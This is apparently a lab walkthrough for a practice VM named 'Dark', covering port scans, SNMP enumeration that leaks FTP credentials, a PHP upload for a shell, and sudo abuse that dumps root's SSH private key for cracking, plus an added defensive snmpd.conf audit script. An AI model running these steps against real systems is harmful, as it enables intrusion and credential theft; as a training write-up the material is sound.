# Lab setup
Download: Dark
Network: NAT, IP: 192.168.1.157
TCP scan results:

```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Dark
|_http-server-header: Apache/2.4.56 (Debian)
8000/tcp open  ftp     pyftpdlib 1.5.7
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.1.157:8000
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
```

UDP scan:

```text
┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.1.157 --top-ports 100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 01:10 EDT
Nmap scan report for 192.168.1.157
Host is up (0.00047s latency).
Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
```
SNMP is open, so probe it: `snmp-check -v 2c -c root 192.168.1.157`
The process list it returns contains the FTP credentials: frank/my_FTP_is_c00l
Log in to the FTP server, put a PHP file, and get a shell.
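The foothold above came from an SNMPv2c community string that let anyone read the process table, arguments included. As an added example that is not part of this writeup, here is a small POSIX sh audit of snmpd.conf that flags the directives behind that exposure next to a hardened configuration; the sample configs, the view name `sysonly` and the user `monitor` are constructed, not taken from the target.

```shell
#!/bin/sh
# Added audit helper (not part of the original writeup). Reads an snmpd.conf
# from stdin, prints each weak directive to stderr and echoes the finding count.
# Both sample configs below are constructed; "sysonly" and "monitor" are
# assumed names.

# Weak: v1/v2c communities (one of them literally "root"), listening everywhere.
WEAK_CONF='rocommunity root
rocommunity public 192.168.1.0/24
agentAddress udp:161'

# Hardened: loopback only, SNMPv3 authPriv user, view limited to the system
# subtree so HOST-RESOURCES hrSWRunTable (process names and arguments) is not
# readable. The v3 user is created with createUser in the persistent config,
# which is not shown here.
HARDENED_CONF='agentAddress udp:127.0.0.1:161
view sysonly included .1.3.6.1.2.1.1
rouser monitor priv -V sysonly'

audit_snmpd_conf() {
    findings=0
    while IFS= read -r line; do
        case "$line" in
            \#*|'') continue ;;
            rocommunity*|rwcommunity*|com2sec*)
                echo "WEAK: v1/v2c community string (cleartext, guessable): $line" >&2
                findings=$((findings + 1)) ;;
            rouser*|rwuser*)
                # A v3 user without "-V VIEW" can read the whole MIB tree.
                case "$line" in
                    *" -V "*) ;;
                    *) echo "WEAK: v3 user with no view restriction: $line" >&2
                       findings=$((findings + 1)) ;;
                esac ;;
            agentAddress*)
                case "$line" in
                    *127.0.0.1*|*localhost*|*::1*) ;;
                    *) echo "WEAK: agent listens on all interfaces: $line" >&2
                       findings=$((findings + 1)) ;;
                esac ;;
        esac
    done
    echo "$findings"
}

printf '%s\n' "$WEAK_CONF" | audit_snmpd_conf       # 3 findings
printf '%s\n' "$HARDENED_CONF" | audit_snmpd_conf   # 0 findings
```

Run it against a real file with `audit_snmpd_conf < /etc/snmp/snmpd.conf`; any non-zero count is a config to fix before a scanner finds it.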
# Privilege escalation

```text
sudo -u alan /usr/bin/sh
```

This gives a shell as alan.

```text
sudo most /root/.ssh/id_rsa > /tmp/id_rsa
```

`most` (a pager) is allowed via sudo, so this dumps root's private key.
Crack the key's passphrase with john: rootbeer
Connect with the private key to get a root shell.